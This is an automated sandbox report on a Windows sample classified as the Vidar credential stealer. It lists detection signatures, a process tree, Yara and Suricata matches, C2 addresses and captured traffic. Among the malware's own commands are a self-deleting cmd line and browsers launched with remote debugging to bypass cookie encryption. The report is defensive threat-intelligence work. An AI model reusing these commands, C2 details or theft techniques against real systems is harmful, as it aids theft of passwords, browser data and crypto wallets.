Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aD7D9fkpII.exe

Overview

General Information

Sample name:aD7D9fkpII.exe
renamed because original name is a hash value
Original sample name:6b3fbdaf99ece34f12dc443f1c630812.exe
Analysis ID:1581195
MD5:6b3fbdaf99ece34f12dc443f1c630812
SHA1:6c553ac99295ba2d02d6aadfc71073d62b2dc414
SHA256:68c5557aaa47968336253c86db39f8526d677dc8f0357bc2122ffe3c6a7915b1
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • aD7D9fkpII.exe (PID: 6408 cmdline: "C:\Users\user\Desktop\aD7D9fkpII.exe" MD5: 6B3FBDAF99ECE34F12DC443F1C630812)
    • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aD7D9fkpII.exe (PID: 572 cmdline: "C:\Users\user\Desktop\aD7D9fkpII.exe" MD5: 6B3FBDAF99ECE34F12DC443F1C630812)
    • aD7D9fkpII.exe (PID: 4712 cmdline: "C:\Users\user\Desktop\aD7D9fkpII.exe" MD5: 6B3FBDAF99ECE34F12DC443F1C630812)
    • aD7D9fkpII.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\aD7D9fkpII.exe" MD5: 6B3FBDAF99ECE34F12DC443F1C630812)
      • chrome.exe (PID: 4760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2304,i,13937775269766581777,3924065134902446641,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • msedge.exe (PID: 8004 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 1524 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2636,i,10720928867294864621,14474913477084532862,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 3868 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQ9ZCBA1N7Q" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 8256 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 1560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 372 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • msedge.exe (PID: 5500 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7500 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6544 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5328 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6728 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8520 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6640 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2333287730.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmpinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
          • 0x2148c:$str01: MachineID:
          • 0x1fe51:$str02: Work Dir: In memory
          • 0x214c3:$str03: [Hardware]
          • 0x21475:$str04: VideoCard:
          • 0x20ae5:$str05: [Processes]
          • 0x20af1:$str06: [Software]
          • 0x1ffbb:$str07: information.txt
          • 0x21198:$str08: %s\*
          • 0x211e5:$str08: %s\*
          • 0x203a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x20961:$str12: UseMasterPassword
          • 0x214cf:$str13: Soft: WinSCP
          • 0x20f6e:$str14: <Pass encoding="base64">
          • 0x214b2:$str15: Soft: FileZilla
          • 0x1ffad:$str16: passwords.txt
          • 0x2098c:$str17: build_id
          • 0x247a0:$str17: build_id
          • 0x257a0:$str17: build_id
          • 0x20a80:$str18: file_data
          Process Memory Space: aD7D9fkpII.exe PID: 6408JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.aD7D9fkpII.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              5.2.aD7D9fkpII.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                5.2.aD7D9fkpII.exe.400000.0.raw.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
                • 0x2148c:$str01: MachineID:
                • 0x1fe51:$str02: Work Dir: In memory
                • 0x214c3:$str03: [Hardware]
                • 0x21475:$str04: VideoCard:
                • 0x20ae5:$str05: [Processes]
                • 0x20af1:$str06: [Software]
                • 0x1ffbb:$str07: information.txt
                • 0x21198:$str08: %s\*
                • 0x211e5:$str08: %s\*
                • 0x203a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x20961:$str12: UseMasterPassword
                • 0x214cf:$str13: Soft: WinSCP
                • 0x20f6e:$str14: <Pass encoding="base64">
                • 0x214b2:$str15: Soft: FileZilla
                • 0x1ffad:$str16: passwords.txt
                • 0x2098c:$str17: build_id
                • 0x247a0:$str17: build_id
                • 0x257a0:$str17: build_id
                • 0x20a80:$str18: file_data
                5.2.aD7D9fkpII.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  5.2.aD7D9fkpII.exe.400000.0.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
                  • 0x2068c:$str01: MachineID:
                  • 0x1f051:$str02: Work Dir: In memory
                  • 0x206c3:$str03: [Hardware]
                  • 0x20675:$str04: VideoCard:
                  • 0x1fce5:$str05: [Processes]
                  • 0x1fcf1:$str06: [Software]
                  • 0x1f1bb:$str07: information.txt
                  • 0x20398:$str08: %s\*
                  • 0x203e5:$str08: %s\*
                  • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                  • 0x1fb61:$str12: UseMasterPassword
                  • 0x206cf:$str13: Soft: WinSCP
                  • 0x2016e:$str14: <Pass encoding="base64">
                  • 0x206b2:$str15: Soft: FileZilla
                  • 0x1f1ad:$str16: passwords.txt
                  • 0x1fb8c:$str17: build_id
                  • 0x1fc80:$str18: file_data

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Browser Started with Remote Debugging
                  Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\aD7D9fkpII.exe", ParentImage: C:\Users\user\Desktop\aD7D9fkpII.exe, ParentProcessId: 6584, ParentProcessName: aD7D9fkpII.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 4760, ProcessName: chrome.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T08:20:10.738391+010020442471Malware Command and Control Activity Detected188.245.216.205443192.168.2.549714TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T08:20:13.235322+010020518311Malware Command and Control Activity Detected188.245.216.205443192.168.2.549716TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T08:20:10.737976+010020490871A Network Trojan was detected192.168.2.549714188.245.216.205443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T08:20:05.916706+010028593781Malware Command and Control Activity Detected192.168.2.549708188.245.216.205443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000000.00000002.2333287730.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                  Multi AV Scanner detection for submitted file
                  Source: aD7D9fkpII.exeVirustotal: Detection: 56%Perma Link
                  Source: aD7D9fkpII.exeReversingLabs: Detection: 71%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                  Machine Learning detection for sample
                  Source: aD7D9fkpII.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004078F0 lstrlenA,CryptUnprotectData,lstrlenA,5_2_004078F0
                  Source: aD7D9fkpII.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49769 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.5:49706 version: TLS 1.2
                  Source: aD7D9fkpII.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_008963B5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_008963B5
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00896304 FindFirstFileExW,0_2_00896304
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_008963B5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_008963B5
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_00896304 FindFirstFileExW,2_2_00896304
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00409460 FindFirstFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_00409460
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,5_2_004170D0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00401730 FindFirstFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,5_2_00401730
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_0040A5D0 FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,5_2_0040A5D0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00414BD0 FindFirstFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,5_2_00414BD0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00406FE0 FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,5_2_00406FE0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00413FF0 FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,memset,strtok_s,memset,strtok_s,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,5_2_00413FF0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_0040C790 FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,CopyFileA,DeleteFileA,_invalid_parameter_noinfo_noreturn,5_2_0040C790
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,Sleep,CopyFileA,memset,CopyFileA,DeleteFileA,memset,_invalid_parameter_noinfo_noreturn,5_2_004081B0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00413FF0 FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,memset,strtok_s,memset,strtok_s,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,5_2_00413FF0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: chrome.exeMemory has grown: Private usage: 12MB later: 39MB

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49714 -> 188.245.216.205:443
                  Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49708 -> 188.245.216.205:443
                  Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.5:49716
                  Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.5:49714
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                  Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 52.168.117.170 52.168.117.170
                  Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                  Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49769 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.16.158.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.25
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.25
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.25
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.124
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.124
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.124
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.25
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.25
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.25
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.25
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.25
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00404280 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,5_2_00404280
                  Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1
